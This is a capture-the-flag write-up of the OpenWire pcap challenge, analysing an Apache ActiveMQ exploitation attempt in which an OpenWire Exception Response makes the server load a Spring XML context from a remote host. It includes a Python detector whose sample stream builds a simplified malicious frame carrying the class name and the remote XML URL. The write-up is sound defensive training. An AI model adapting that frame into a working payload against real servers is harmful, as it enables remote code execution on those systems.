During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.
https://cyberdefenders.org/blueteam-ctf-challenges/openwire/



By reviewing the traffic, I noticed the use of the OpenWire protocol in packets 4 and 5, which immediately stood out as unusual. I followed the TCP stream for these packets and observed an Exception Response (0x1F) being sent. This response invoked the org.springframework.context.support.ClassPathXmlApplicationContext class, which then attempted to load a bean definition from an external XML file. The XML file was being retrieved from http://146.190.21.92:8000/invoice.xml. Since this IP is hosting the malicious XML used to trigger the exploit, it is the C2 server: 146.190.21.92.


From the packet capture, it’s clear that the Exception Response was directed at the service listening on port 61616. This port is commonly used by Apache ActiveMQ, which matches the exploitation activity observed.
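To turn the two observations above (an OpenWire Exception Response carrying a Spring context class name and a remote XML URL, aimed at port 61616) into something repeatable, the following detector walks a reassembled TCP stream, splits it into OpenWire frames, and flags any 0x1F frame whose length-prefixed strings combine a fully-qualified Java class name with an http(s) URL. This is an added example for the write-up, not code from the challenge or from ActiveMQ; the sample stream is constructed inline with a simplified frame layout (4-byte length, command byte, then 2-byte-length-prefixed strings), the regexes and the `min_len` threshold are my own tuning assumptions, and the string walk is a heuristic rather than a full OpenWire unmarshaller.

```python
import re
import struct

ACTIVEMQ_OPENWIRE_PORT = 61616       # service the Exception Response targeted in the capture
OPENWIRE_EXCEPTION_RESPONSE = 0x1F   # OpenWire command type seen in packets 4 and 5

# Assumed detection heuristics (not from the write-up): a dotted Java class name
# and an absolute http(s) URL appearing together in one Exception Response.
CLASS_NAME_RE = re.compile(r"^[a-z][a-z0-9]*(\.[A-Za-z0-9_$]+){2,}$")
URL_RE = re.compile(r"^https?://\S+$")


def openwire_frames(stream: bytes) -> list[bytes]:
    """Split a reassembled TCP stream into OpenWire frame bodies (4-byte big-endian length prefix)."""
    frames, off = [], 0
    while off + 4 <= len(stream):
        (length,) = struct.unpack(">I", stream[off:off + 4])
        body = stream[off + 4:off + 4 + length]
        if len(body) < length:      # truncated trailing frame: stop rather than misparse
            break
        frames.append(body)
        off += 4 + length
    return frames


def length_prefixed_strings(body: bytes, min_len: int = 4) -> list[str]:
    """Heuristically recover 2-byte-length-prefixed printable ASCII strings from a frame body."""
    found, i = [], 0
    while i + 2 <= len(body):
        (n,) = struct.unpack(">H", body[i:i + 2])
        if min_len <= n <= len(body) - i - 2:
            chunk = body[i + 2:i + 2 + n]
            if all(0x20 <= b < 0x7F for b in chunk):
                found.append(chunk.decode("ascii"))
                i += 2 + n          # skip past the string so its bytes are not re-scanned
                continue
        i += 1
    return found


def analyze_stream(stream: bytes, dst_port: int) -> list[dict]:
    """Return one finding per Exception Response frame that pairs a class name with a remote URL."""
    findings = []
    for idx, body in enumerate(openwire_frames(stream)):
        if not body or body[0] != OPENWIRE_EXCEPTION_RESPONSE:
            continue
        strings = length_prefixed_strings(body)
        classes = [s for s in strings if CLASS_NAME_RE.match(s)]
        urls = [s for s in strings if URL_RE.match(s)]
        if classes and urls:
            findings.append({
                "frame": idx,
                "dst_port": dst_port,
                "command": body[0],
                "class": classes[0],
                "url": urls[0],
                "note": "OpenWire ExceptionResponse loading a Spring context from a remote XML",
            })
    return findings


# ---- Constructed sample stream (simplified, not a faithful OpenWire marshalling) ----
def _utf(s: str) -> bytes:
    return struct.pack(">H", len(s)) + s.encode("ascii")


def _frame(body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + body


BENIGN_FRAME = _frame(bytes([0x01]) + _utf("ActiveMQ"))   # stand-in for a normal handshake frame
MALICIOUS_FRAME = _frame(
    bytes([OPENWIRE_EXCEPTION_RESPONSE])
    + struct.pack(">i", 1)          # placeholder command id
    + b"\x01"                       # placeholder "throwable present" flag
    + _utf("org.springframework.context.support.ClassPathXmlApplicationContext")
    + _utf("http://146.190.21.92:8000/invoice.xml")
)
SAMPLE_STREAM = BENIGN_FRAME + MALICIOUS_FRAME

if __name__ == "__main__":
    for f in analyze_stream(SAMPLE_STREAM, ACTIVEMQ_OPENWIRE_PORT):
        print(f"frame {f['frame']} -> :{f['dst_port']} cmd=0x{f['command']:02X} "
              f"class={f['class']} url={f['url']}")
```

In practice the stream would come from `tcp.stream` reassembly in Wireshark or from tshark's `-z follow` output; the heuristic string walk is deliberately tolerant so it still recovers the class name and URL even when the surrounding fields differ from the simplified layout used here. The benign frame in the sample shows the detector staying quiet on ordinary traffic.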
